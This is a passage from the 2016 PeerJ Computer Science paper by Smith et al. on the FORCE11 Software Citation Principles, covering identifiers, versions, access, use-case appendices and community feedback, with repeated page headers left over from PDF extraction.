describing a piece of research software, often known as software papers (see Software Papers). While some journals (e.g., Transactions on Mathematical Software (TOMS), Bioinformatics, Computer Physics Communications, F1000Research, Seismological Research Letters, Electronic Seismologist) have traditionally accepted software submissions, the American Astronomical Society (AAS) has recently announced they will accept software papers in their journals (AAS Editorial Board, 2016). Professional societies are in a good position to change their respective communities, as the publishers of journals and conveners of domain-specific conferences; as publishers they can change editorial policies (as AAS has done) and conferences are an opportunity to communicate and discuss these changes with their communities. In astronomy and astrophysics: The Astrophysics Source Code Library (ASCL; http://ASCL.net) is a website dedicated to the curation and indexing of software used in the astronomy-based literature. In 2015, the AAS and GitHub co-hosted a workshop Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 8/31 http://wssspe.researchcomputing.org.uk/ http://www.software.ac.uk/community/workshops http://www.software.ac.uk/community/workshops http://f1000research.com/for-authors/article-guidelines/software-tool-articles http://f1000research.com/for-authors/article-guidelines/software-tool-articles http://www.journals.elsevier.com/softwarex/ http://www.journals.elsevier.com/softwarex/ http://www.openresearchcomputation.com http://openresearchsoftware.metajnl.com http://ASCL.net http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ (Norén, 2015) dedicated to software citation, indexing, and discoverability in astrophysics. More recently, a Birds of a Feather session was held at the Astronomical Data Analysis Software and Systems (ADASS) XXV conference (Allen et al., 2015) that included discussion of software citation. In the life sciences: In May 2014, the NIH held a workshop aimed at helping the biomedical community discover, cite, and reuse software written by their peers. The primary outcome of this workshop was the Software Discovery Index Meeting Report (White et al., 2014) which was shared with the community for public comment and feedback. The authors of the report discuss what framework would be required for supporting a Software Discovery Index including the need for unique identifiers, how citations to these would be handled by publishers, and the critical need for metadata to describe software packages. In the geosciences: The Ontosoft (Gil, Ratnakar & Garijo, 2015) project describes itself as “A Community Software Commons for the Geosciences.” Much attention was given to the metadata required to describe, discover, and execute research software. The NSF-sponsored Geo-Data Workshop 2011 (Fox & Signell, 2011) revolved around data lifecycle, management, and citation. The workshop report includes many recommendations for data citation. Existing efforts around metadata standards Producing detailed specifications and recommendations for possible metadata standards to support software citation was not within the scope of this working group. However some discussion on the topic did occur and there was significant interest in the wider community to produce standards for describing research software metadata. Content specifications for software metadata vary across communities, and include DOAP (https://github.com/edumbill/doap/), an early metadata term set used by the Open Source Community, as well as more recent community efforts like Research Objects (Bechhofer et al., 2013), The Software Ontology (Malone et al., 2014), EDAM Ontology (Ison et al., 2013), Project CRediT (CRediT, 2016), the OpenRIF Contribution Role Ontology (Gutzman et al., 2016), Ontosoft (Gil, Ratnakar & Garijo, 2015), RRR/JISC guidelines (Gent, Jones & Matthews, 2015), or the terms and classes defined at schema.org related to the https://schema.org/SoftwareApplication class. In addition, language-specific software metadata schemes are in widespread use, including the Debian package format (Jackson & Schwarz, 2016), Python package descriptions (Ward & Baxter, 2016), and R package descriptions (Wickham, 2015), but these are typically conceived for software build, packaging, and distribution rather than citation. CodeMeta (Jones et al., 2014) has created a crosswalk among these software metadata schemes and an exchange format that allows software repositories to effectively interoperate. DISCUSSION In this section we discuss some the issues and concerns related to the principles stated in section Software Citation Principles. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 9/31 https://github.com/edumbill/doap/ https://schema.org/ https://schema.org/SoftwareApplication http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ What software to cite The software citation principles do not define what software should be cited, but rather how software should be cited. What software should be cited is the decision of the author(s) of the research work in the context of community norms and practices, and in most research communities, these are currently in flux. In general, we believe that software should be cited on the same basis as any other research product such as a paper or book; that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers, perhaps following the FORCE11 Data Citation Working Group principles, which state, “In scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited” (Data Citation Synthesis Group, 2014). Some software which is, or could be, captured as part of data provenance may not be cited. Citation is partly a record of software important to a research outcome 3 , where provenance is a record of all steps (including software) used to generated particular data within the research process. Research results, including data, increasingly depend on software (Hannay et al., 2009), and thus may depend on the specific version used (Sandve et al., 2013; Wilson et al., 2014). Furthermore, errors in software or environment variations can affect results (Morin et al., 2012; Soergel, 2015). This implies that for a data research product, provenance data will include some of the cited software. Similarly, the software metadata recorded as part of data provenance will overlap the metadata recorded as part of software citation for the software that was used in the work. The data recorded for reproducibility should also overlap the metadata recorded as part of software citation. In general, we intend the software citation principles to cover the minimum of what is necessary for software citation for the purpose of software identification. Some use cases related to citation (e.g., provenance, reproducibility) might have additional requirements beyond the basic metadata needed for citation, as Table 2 shows. Software papers Currently, and for the foreseeable future, software papers are being published and cited, in addition to software itself being published and cited, as many community norms and practices are oriented towards citation of papers. As discussed in the Importance principle (1) and the discussion above, the software itself should be cited on the same basis as any other research product; authors should cite the appropriate set of software products. If a software paper exists and it contains results (performance, validation, etc.) that are important to the work, then the software paper should also be cited. We believe that a request from the software authors to cite a paper should typically be respected, and the paper cited in addition to the software. Derived software The goals of software citation include the linked ideas of crediting those responsible for software and understanding the dependencies of research products on specific software. In the Importance principle (1), we state that “software should be cited on the same basis as any other research product such as a paper or a book; that is, authors should cite 3 Citation can be used for many purposes, including for software: which software has been used in the work, which software has influenced the work, which software is the work superseding, which software is the work disproving, etc. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 10/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ the appropriate set of software products just as they cite the appropriate set of papers.” In the case of one code that is derived from another code, citing the derived software may appear to not credit those responsible for the original software, nor recognize its role in the work that used the derived software. However, this is really analogous to how any research builds on other research, where each research product just cites those products that it directly builds on, not those that it indirectly builds on. Understanding these chains of knowledge and credit have been part of the history of science field for some time, though more recent work suggests more nuanced evaluation of the credit chains (CRediT, 2016; Katz & Smith, 2015). Software peer review Adherence to the software citation principles enables better peer review through improved reproducibility. However, since the primary goal of software citation is to identify the software that has been used in a scholarly product, the peer review of software itself is mostly out of scope in the context of software citation principles. For instance, when identifying a particular software artifact that has been used in a scholarly product, whether or not that software has been peer-reviewed is irrelevant. One possible exception would be if the peer-review status of the software should be part of the metadata, but the working group does not believe this to be part of the minimal metadata needed to identify the software. Citation format in reference list Citations in references in the scholarly literature are formatted according to the citation style (e.g., AMS, APA, Chicago, MLA) used by that publication. (Examples illustrating these styles have been published by Lipson (2011); the follow-on Software Citation Implementation Group will provide suggested examples.) As these citations are typically sent to publishers as text formatted in that citation style, not as structured metadata, and because the citation style dictates how the human reader sees the software citation, we recommend that all text citation styles support the following: a) a label indicating that this is software, e.g., [Software], potentially with more information such as [Software: Source Code], [Software: Executable], or [Software: Container], and b) support for version information, e.g., Version 1.8.7. Citations limits This set of software citation principles, if followed, will cause the number of software citations in scholarly products to increase, thus causing the number of overall citations to increase. Some scholarly products, such as journal articles, may have strict limits on the number of citations they permit, or page limits that include reference sections. Such limits are counter to our recommendation, and we recommend that publishers using strict limits for the number of citations add specific instructions regarding software citations to their author guidelines to not disincentivize software citation. Similarly, publishers should not include references in the content counted against page limits. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 11/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Unique identification The Unique Identification principle (3) calls for “a method for identification that is machine actionable, globally unique, interoperable, and recognized by a community.” What this means for data is discussed in detail in the “Unique Identification” section of a report by the FORCE11 Data Citation Implementation Group (Starr et al., 2015), which calls for “unique identification in a manner that is machine-resolvable on the Web and demonstrates a long-term commitment to persistence.” This report also lists examples of identifiers that match these criteria including DOIs, PURLs, Handles, ARKS, and NBNs. For software, we recommend the use of DOIs as the unique identifier due to their common usage and acceptance, particularly as they are the standard for other digital products such as publications. While we believe there is value in including the explicit version (e.g., Git SHA1 hash, Subversion revision number) of the software in any software citation, there are a number of reasons that a commit reference together with a repository URL is not recommended for the purposes of software citation: 1. Version numbers/commit references are not guaranteed to be permanent. Projects can be migrated to new version control systems (e.g., SVN to Git). In addition, it is possible to overwrite/clobber a particular version (e.g., force-pushing in the case of Git). 2. A repository address and version number does not guarantee that the software is available at a particular (resolvable) URL, especially as it is possible for authors to remove their content from, e.g., GitHub. 3. A particular version number/commit reference may not represent a “preferred” point at which to cite the software from the perspective of the package authors. We recognize that there are certain situations where it may not be possible to follow the recommended best-practice. For example, if (1) the software authors did not register a DOI and/or release a specific version, or (2) the version of the software used does not match what is available to cite. In those cases, falling back on a combination of the repository URL and version number/commit hash would be an appropriate way to cite the software used. Note that the “unique” in a UID means that it points to a unique, specific software version. However, multiple UIDs might point to the same software. This is not recommended, but is possible. We strongly recommend that if there is already a UID for a version of software, no additional UID should be created. Multiple UIDs can lead to split credit, which goes against the Credit and Attribution principle (2). Software versions and identifiers There are at least three different potential relationships between identifiers and versions of software: 1. An identifier can point to a specific version of a piece of software. 2. An identifier can point to the piece of software, effectively all versions of the software. 3. An identifier can point to the latest version of a piece of software. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 12/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ It is possible that a given piece of software may have identifiers of all three types. In addition, there may be one or more software papers, each with an identifier. While we often need to cite a specific version of software, we may also need a way to cite the software in general and to link multiple releases together, perhaps for the purpose of understanding citations to the software. The principles in section Software Citation Principles are intended to be applicable at all levels, and to all types of identifiers, such as DOIs, RRIDs, etc., though we again recommend when possible the use of DOIs that identify specific versions of source code. We note that RRIDs were developed by the FORCE11 Resource Identification Initiative (https://www.force11.org/group/ resource-identification-initiative) and have been discussed for use to identify software packages (not specific versions), though the FORCE11 Resource Identification Technical Specifications Working Group (https://www.force11.org/group/resource- identification-technical-specifications-working-group) says “Information resources like software are better suited to the Software Citation WG.” There is currently a lack of consensus on the use of RRIDs for software. Types of software The principles and discussion in this document have generally been written to focus on software as source code. However, we recognize that some software is only available as an executable, a container, or a virtual machine image, while other software may be available as a service. We believe the principles apply to all of these forms of software, though the implementation of them will certainly differ based on software type. When software is accessible as both source code and another type, we recommend that the source code be cited. Access to software The Accessibility principle (5) states that “software citations should permit and facilitate access to the software itself.” This does not mean that the software must be freely available. Rather, the metadata should provide enough information that the software can be accessed. If the software is free, the metadata will likely provide an identifier that can be resolved to a URL pointing to the specific version of the software being cited. For commercial software, the metadata should still provide information on how to access the specific software, but this may be a company’s product number or a link to a website that allows the software be purchased. As stated in the Persistence principle (4), we recognize that the software version may no longer be available, but it still should be cited along with information about how it was accessed. What an identifier should resolve to While citing an identifier that points to, e.g., a GitHub repository can satisfy the principles of Unique Identification (3), Accessibility (5), and Specificity (6), such a repository cannot guarantee Persistence (4). Therefore, we recommend that the software identifier should resolve to a persistent landing page that contains metadata and a link to the software itself, rather than directly to the source code files, repository, or executable. This ensures Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 13/31 https://www.force11.org/group/resource-identification-initiative https://www.force11.org/group/resource-identification-initiative https://www.force11.org/group/resource-identification-technical-specifications-working-group https://www.force11.org/group/resource-identification-technical-specifications-working-group http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ longevity of the software metadata—even perhaps beyond the lifespan of the software they describe. This is currently offered by services such as figshare and Zenodo (GitHub, 2014), which both generate persistent DataCite DOIs for submitted software. In addition, such landing pages can contain both human-readable metadata (e.g., the types shown by Table 2) as well as content-negotiable formats such as RDF or DOAP (https://github.com/edumbill/doap/). Updates to these principles As this set of software citation principles has been created by the FORCE11 Software Citation Working Group (https://www.force11.org/group/software-citation-working- group), which will cease work and dissolve after publication of these principles, any updates will require a different FORCE11 working group to make them. As mentioned in section Future Work, we expect a follow-on working group to be established to promote the implementation of these principles, and it is possible that this group might find items that need correction or addition in these principles. We recommend that this Software Citation Implementation Working Group be charged, in part, with updating these principles during its lifetime, and that FORCE11 should listen to community requests for later updates and respond by creating a new working group. FUTURE WORK Software citation principles without clear worked-through examples are of limited value to potential implementers, and so in addition to this principles document, the final deliverable of this working group will be an implementation paper outlining working examples for each of the use cases listed in section Use Cases. Following these efforts, we expect that FORCE11 will start a new working group with the goals of supporting potential implementers of the software citation principles and concurrently developing potential metadata standards, loosely following the model of the FORCE11 Data Citation Working Group. Beyond the efforts of this new working group, additional effort should be focused on updating the overall academic credit/citation system. APPENDIX A Working group membership Alberto Accomazzi, Harvard-Smithsonian CfA Alice Allen, Astrophysics Source Code Library Micah Altman, MIT Jay Jay Billings, Oak Ridge National Laboratory Carl Boettiger, University of California, Berkeley Jed Brown, University of Colorado Boulder Sou-Cheng T. Choi, NORC at the University of Chicago & Illinois Institute of Technology Neil Chue Hong, Software Sustainability Institute Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 14/31 https://github.com/edumbill/doap/ https://www.force11.org/group/software-citation-working-group https://www.force11.org/group/software-citation-working-group http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Tom Crick, Cardiff Metropolitan University Mercè Crosas, IQSS, Harvard University Scott Edmunds, GigaScience, BGI Hong Kong Christopher Erdmann, Harvard-Smithsonian CfA Martin Fenner, DataCite Darel Finkbeiner, OSTI Ian Gent, University of St Andrews, recomputation.org Carole Goble, The University of Manchester, Software Sustainability Institute Paul Groth, Elsevier Labs Melissa Haendel, Oregon Health and Science University Stephanie Hagstrom, FORCE11 Robert Hanisch, National Institute of Standards and Technology, One Degree Imager Edwin Henneken, Harvard-Smithsonian CfA Ivan Herman, World Wide Web Consortium (W3C) James Howison, University of Texas Lorraine Hwang, University of California, Davis Thomas Ingraham, F1000Research Matthew B. Jones, NCEAS, University of California, Santa Barbara Catherine Jones, Science and Technology Facilities Council Daniel S. Katz, University of Illinois (co-chair) Alexander Konovalov, University of St Andrews John Kratz, California Digital Library Jennifer Lin, Public Library of Science Frank Löffler, Louisiana State University Brian Matthews, Science and Technology Facilities Council Abigail Cabunoc Mayes, Mozilla Science Lab Daniel Mietchen, National Institutes of Health Bill Mills, TRIUMF Evan Misshula, CUNY Graduate Center August Muench, American Astronomical Society Fiona Murphy, Independent Researcher Lars Holm Nielsen, CERN Kyle E. Niemeyer, Oregon State University (co-chair) Karthik Ram, University of California, Berkeley Fernando Rios, Johns Hopkins University Ashley Sands, University of California, Los Angeles Soren Scott, Independent Researcher Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 15/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Frank J. Seinstra, Netherlands eScience Center Arfon Smith, GitHub (co-chair) Kaitlin Thaney, Mozilla Science Lab Ilian Todorov, Science and Technology Facilities Council Matt Turk, University of Illinois Miguel de Val-Borro, Princeton University Daan Van Hauwermeiren, Ghent University Stijn Van Hoey, Ghent University Belinda Weaver, The University of Queensland Nic Weber, University of Washington iSchool APPENDIX B Software citation use cases This appendix records an edited, extended description of the use cases discussed in section Use Cases, originally found in FORCE11 Software Citation Working Group. This discussion is not fully complete, and in some cases, it may not be fully self-consistent, but it is part of this paper as a record of one of the inputs to the principles. We expect that the follow-on Software Citation Implementation Group will further develop these use cases, including explaining in more detail how the software citation principles can be applied to each as part of working with the stakeholders to persuade them to actually implement the principles in their standard workflows. Researcher who uses someone else’s software for a paper One of the most common use cases may be researchers who use someone else’s software and want to cite it in a technical paper. This will be similar to existing practices for citing research artifacts in papers. “Requirements” for researcher: � Name of software � Names of software authors/contributors � Software version number and release date, or download date � Location/repository, or contact name/email (if not publicly available) � Citable DOI of software � Format for citing software in text and in bibliography Possible steps: 1. Software developers create CITATION file and associate with source code release/ repository. 2. Researcher finds and uses software for research paper. 3. Researcher identifies citation metadata file (e.g., “CITATION” file) associated with downloaded/installed software source code or in online repository/published location. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 16/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ CITATION file includes necessary citation metadata. CITATION file may include BibTeX entry, suggested citation format. 4. Researcher cites software appropriately, e.g., in methodology section; reference included in bibliography. Researcher who uses someone else’s software for new software In this case, a researcher develops new software that incorporates or depends on existing software. In order to credit the developer(s), the researcher will include citations in his/her source code, documentation, or other metadata in a similar manner to papers. Requirements for researcher: � Name of software � Names of software authors/contributors � Software version number and release date � Location/repository � Citable DOI of software � Format for citing software in source code, documentation, or citation metadata file Possible steps: 1. Assume that software developers have created a CITATION file and associated with the source code release/repository. 2. Researcher finds and uses software in the development of new software. 3. Researcher identifies citation metadata file (e.g., “CITATION” file) associated with downloaded/installed software source code or in online repository/published location. CITATION file includes necessary citation metadata. CITATION file may include BibTeX entry, suggested citation format. 4. Researcher cites software in source code, documentation, or other metadata- containing file. Researcher who contributes to someone else’s software (open source project) A researcher wants to contribute to someone else’s software in the manner in which their contributions will be accepted and recognized. Possible steps: 1. Researcher finds information about the software, and how contributors will be recognized 2. Researcher possibly submit a Contributor License Agreement (CLA) or Copyright Assignment Agreement (CAA) to allow the contributed content to be distributed with the software being contributed to 3. Researcher contributes to the software 4. Software maintainers accept contribution, recognize researcher’s contribution, and update the software metadata as appropriate Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 17/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Researcher who wants to know who uses the researcher’s software This case is similar to a researcher who wants to find other papers/publications that cite a particular paper. A researcher wants to gauge the usage of her software within or across communities and measure its impact on research for both credit and funding. Requirements: � Uniquely identify software � Indexed citations of software � Indexed papers that use software Steps: 1. Researcher finds software official name or unique DOI in metadata associated with downloaded/installed source code or in online repository/published location. 2. Researcher searches for software, may use online indexer (e.g., Scopus, Web of Science, Google Scholar) using software name or DOI. 3. Online indexer presents entry for software with list of citations, if any. Ideally, entry will also include metadata contained in software CITATION file and citation example. Researcher gets credit for software development at the academic/governmental institution, in professional career, etc This case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. Requirements for researcher: � Name of software � Names of software authors/contributors � Location/repository � Citable DOI of software � Format for citing software in an official CV, in a departmental/institutional review report, etc. � Role in the software creation, that is linked to version or component � Role in contributing to the software as a “package” (not just lines of code) development of benchmarks, testing, documentation, tutorials etc. Researcher who wants to “reproduce” another person/group’s analysis When a researcher wants to understand or verify a research results from another researcher, they would like to use the same software. Note that accessing the exact same software is necessary but not sufficient for reproducibility. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 18/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Requirements for researcher: � Name of software � Location/repository for the exact release that was used � DOI or other persistent handle for that specific release � Release has all components necessary for reproducing the work (Note: this ideally also means sample inputs and outputs) Researcher who wants to find a piece of software to implement a task This is the case where a research is looking for software to use but wants to understand whether it is being used in a scholarly fashion. For example, a researcher searches through a software repository and finds a package that might be useful. They look to find whether it has been used by others in the scientific literature. Requirements: � Either the software documentation page has a reference to existing literature that makes use of it. � There is a mechanism to look it up. Publisher wants to publish a software paper This case asks what information regarding software is needed for a publisher who wants to publish a paper describing that software. Requirements: � Name of software � Names of software authors/contributors � Location/repository � Citable DOI of software � Format for citing software in JATS, for example, as well as references in the text itself Publisher who wants to publish papers that cite software This case asks what information regarding software is needed for a publisher who wants to publish papers that cite that software. Requirements for publisher: � Name of software � Names of software authors/contributors � Location/repository � Citable DOI of software � Format for citing software in, e.g., JATS, as well as references in the text itself Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 19/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Indexer (e.g., Scopus, WoS, Scholar, MS Academic Search) who wants to build a catalog of software Provide an index over the software that is used within the research domain. Track how that software is being used by different groups of researchers and to what ends. Requirements: � Uniquely identify pieces of software used by the research literature � Connect authors and organizations to that software � Connect various software versions together Domain group (e.g., ASCL, bioCADDIE), Libraries, and Archives (e.g., University library, laboratory archive, etc.) wants to build a catalog/registry of institutional or domain software There are two different examples here: One is building a catalog/archive of software produced by those affiliated with the institution. The other is along the lines of Sayeed Choudhury’s note that “data are the new special collections.” An institution may choose to build a catalog/archive of many things within a single topic or subject in order to secure all the software on a certain topic or build a collection that may draw users to their establishment, much like special collections now do for university libraries and archives. Repository showing scientific impact of holdings A repository that archives and/or maintains a collection of software. The repository would like to address usage and impact of software in its holding. Usage would aid potential users whether the software is being actively maintained or developed or has been superseded. Both would help repository know how to direct resources, e.g., maintenance, training etc. This is similar to the case of a funder wanting to know the impact of funded work. Requirements: � Code name, or a unique identifier � Relationships to previous versions � Connect to repository � Connect to research Funder who wants to know how software they funded has been used This use case is similar to “Repository showing scientific impact of holdings”, where a funder wants to find out the use and impact and software that they supported. It is also similar to “Researcher who wants to know who uses the researcher’s software.” Evaluator or funder wants to evaluate contributions of a researcher In this use case, an evaluator (e.g., academic administrator) or funder wants to evaluate the contributions of a researcher who develops software. This case is related to those Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 20/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ where researchers want to get credit for software development, or where organizations want to evaluate the impact of software itself. Reference management system used by researchers to author a manuscript Reference management systems may need to be updated to internally understand that their is a software reference type, and to be able to output references to software in common formats. Requirements for reference manager: � Names of software authors/contributors � Software version number and release date � Location/repository � Citable DOI of software or paper recommended for citation � Format for citing software in citation metadata file � Citation metadata tags embedded in DOI landing page/software project page for easy ingest Possible steps: 1. Reference management system such as EndNote, Mendeley, Zotero, etc. builds affordances for software references. 2. Researcher finds software citation and adds it to their reference manager library, by (a) importing from the CITATION file (e.g., BibTeX, RIS), or (b) clicking on, e.g., an “add to Zotero library” widget in web browser. 3. Researcher writes a paper and uses the reference manager to generate citations or bibliography. Repository wants to publish mixed data/software packages Domain and institutional data repositories have both data and software artifacts, and want to link these together in a provenance trace that can be cited. Sometimes the software is a separately identified artifact, but at other times software is included inside of data packages, and the researcher wants to cite the combined product. Use cases not adopted in the table Researcher who benchmarks someone else’s software with or without modification on one or many hardware platforms for publication This case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 21/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Requirements for researcher: � Name of software � Names of software authors/contributors � Software version number and release date � Location/repository � Citable DOI of software or paper recommended for citation � Format for citing software in source code or citation metadata file Possible steps: 1. Software developers create CITATION file and associate with source code release/repository. 2. Researcher finds and uses software in the development of new software. 3. Researcher identifies citation metadata file (e.g., CITATION file) associated with downloaded/installed software source code or in online repository/published location. CITATION file includes necessary citation metadata. CITATION file may include BibTeX entry, suggested citation format. 4. Researcher cites software in source code, documentation, or other metadata-containing file. After review of this use case, we decided that based on the title this falls under use case 1, where a researcher uses someone else’s software for a paper. Unlike use case 1, which is general in terms of the use of software, here the use leads to a benchmarking study—but the outcome in both cases is a paper that needs to cite the software. Researcher who wants to publish about a piece of software The research wants to publish about a version of software they have produced. A key part of this use case is to be able to connect the given narrative to a specific version of the software in questions and connect that in large story. Requirements: � Name of software � Names of software authors/contributors � Location/repository � Citable DOI of Software � Links to older versions of software This is similar to use case 1, other than the fact that the software developer(s) and paper author(s) will likely be the same person/people here. Researcher wants to record the software that generated some data This is the case where a researcher is using some software to perform an analysis, either of a physical sample or of data. The researcher needs to know which version was used, for Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 22/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ example in case a bug was fixed. Note that knowing the software and its version is not sufficient to determine the “conditions” of the analysis, but they are essential. Requirement: The analysis, or the generated data, has information about the software used. This is also similar to use case 1, except in that case the research output is a paper, while here the output is a dataset. Researcher who wants to reproduce experience of use of a particular software implementation in context Researcher is engaged in historical/cultural research, e.g., a study of video games as cultural artifacts. Requirements: � Name of software � Software version number � Documentation of the execution environment/context � Location/repository for virtual machine (or equivalent) comprising both software and execution environment/context � Persistent identifier associated with virtual machine instance (or equivalent) comprising both software and execution environment/context Possible steps: 1. Researcher obtains persistent ID from citation 2. Research uses a persistent ID resolution service to resolve ID to a location of an executable VM instance in a repository 3. Researcher obtains VM in the repository, executes it, and interacts with software This overlaps use case 6 (reproducing analysis), and so we decided not to include this as a distinct use case. APPENDIX C Feedback following FORCE2016 This appendix contains a record of comments made by the FORCE11 community on the draft Software Citation Principles, either directly via Hypothesis on the draft document (https://www.force11.org/softwarecitation-principles) posted following the FORCE2016 conference (https://www.force11.org/meetings/force2016) or via GitHub issues (https://github.com/force11/force11-scwg/issues), and the responses to these comments. On unique identification I know this suggestion of a single unique identifier comes from the DOI perspective where it works pretty well, but I’m wondering if something different in the way of identification should be used for software. For creative works generally there is the FRBR model Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 23/31 https://www.force11.org/softwarecitation-principles https://www.force11.org/meetings/force2016 https://github.com/force11/force11-scwg/issues http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ (https://en.wikipedia.org/wiki/Functional_Requirements_for_Bibliographic_Records) which defines several levels for a creative entity—“work,” “expression,” “manifestation,” and “item.” I think something along these lines are particularly relevant for software—it is useful to be able to locate all uses of a particular piece of software no matter what version (the “work” level—software identified by a particular name and purpose over a period of time), but it is also important to specify the particular version used in any given work (“expression”—the source code at the time of use) and in some cases also the platform (“manifestation”—the compiled bytes including libraries, for example a docker image). “Item” probably isn’t relevant for software. That is, I think a software citation perhaps could use THREE distinct unique identifiers, one for the work itself, one for the specific version (source code), and possibly an additional one for the actual downloadable binary image that can be run. Rather than leave it implicit I think recognizing the different levels of citable record would be helpful here. #F11SC Reply: I interpret the requirement for “global uniqueness” as referring to the identifier itself. Two different people can have the same name (not globally unique) but cannot share a single ORCID (globally unique). Global uniqueness of the identifier does not preclude multiple identifiers pointing to the same person. I think the suggestion of differentiating between different software expressions/manifestations/items is a reasonable one, but I don’t think it relaxes the requirement for identifiers to be globally unique. Our response: We agree that there are valid points here, but on balance we don’t feel that the rewards from implementing this outweigh the practical challenges. On accessibility Should this document address this in further detail? For example, “permit and facilitate access” could be explored further. Should this be done through open access licensing? repositories? Who’s responsible for providing this access? I am also wondering if this is a separate issue since “citing” traditionally pointed to publications but did not necessarily address access. DOI, for example is stated, but doesn’t guarantee “access,” so does this simply restating point 3, or should it provide something new? Our response: We agree that accessibility should receive further attention, which the follow-on group focusing on implementation will provide. However, this is out of scope for the document outlining the principles. To the second point, accessibility provides information about access, but does not guarantee access itself (e.g., paywalled article). On specificity I am wondering if this should be folded into number 3 “Unique Identification.” Both seem to deal with the issue of identification and access. Our response: A unique software identifier can point to the specific version/variant of software, but it can also identify other things (collection of versions, repository, etc.), Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 24/31 https://en.wikipedia.org/wiki/Functional_Requirements_for_Bibliographic_Records http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ while this principle deals with the need to identify the specific version of software used (via citation). On academic credit A lot of software that were developed by non-academic engineers also contribute to academic research indirectly. Their names and contributions should also be credited. So removing “Academic” makes more sense? Reply: This is a good point, though I think academic and non-academic credit are different, so perhaps we can add to this regarding non-academic credit, rather than removing “academic.” Reply: I agree with Daniel on this. Keep Academic and add non-academic. Our response: We’ve made the bullet more general, just about credit, discussing academic credit and adding a sentence about non-academic credit as well. On citations in text Although the focus here is on citations in the references, as a publisher, our experience is that most common practice of “citation” of data and software for authors is typically in the main body of the text. In order to encourage software to be treated and valued as a first-class research object, it is important that citations to it be positioned in the references as citations to articles and books are. However, it would be a missed opportunity if we did not leverage current practices of authors. This will also likely arise during implementation, as it has for the Data Citation Implementation Publisher Early Adopters Pilot. This could be addressed in future work on implementation. Our response: In the principles, we propose that software should be cited in the references list, to recognize the primary role of software in research. However, this practice is not mutually exclusive with also referencing/citing software in the main body of a paper—as long as the software is cited in the references. On unique identification Clearer instructions will be needed for authors on which version to cite. For BioMed Central journals, we ask authors to cite two versions of the software, an archived version (e.g., on Zenodo) as well as the current version (e.g., on GitHub). This is to ensure accessibility. However, if repositories and archives were to include a persistent link to the current version of the software, publishers could then instruct authors to cite only software with a UID, which wouldn’t point to a current version, but would point to the version(s) used and would be a more accurate version of scientific record. Related to this point is the idea of group object identifiers. A need for group identifiers has been identified in the area of data (e.g., in the case of meta-analyses), and one could also identify a use case for these in the case of software, collecting metadata around all versions of a given software package. See blog here (https://blog. datacite.org/to-better-understand-research-communication-we-need-a-groid-group- object-identifier/). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 25/31 https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Our response: We recommend citing the specific version of the software that was used. We expect that the unique identifier (e.g., DOI) will point to a landing page that directs to the repository/current version. However, this is more of a convenience issue that the software developers should address, rather than the author citing the software they used. On future work For implementation we would recommend both consulting with adopters as well as developing metadata standards simultaneously rather than developing metadata standards and then pursuing early adopters implementation. The work early adopters are doing now for data citation will be able to be leveraged for software citation and the changes needed to do so could happen now. There is no need to wait on approval of new tagging for a specific metadata standard. Many publishers will have their own preferred metadata standards and so implementation could begin now with publishers, as long as we know what we want to capture. Future implementation groups might also consider levels of contribution. This is particularly relevant for software. Who is considered an author? For example, to what extent should authors of pull requests receive attribution? This might be considered in an FAQs group, or possibly an early adopters group. Our response: We agree that metadata standards should be developed with the input of adopters, and have updated this text accordingly. 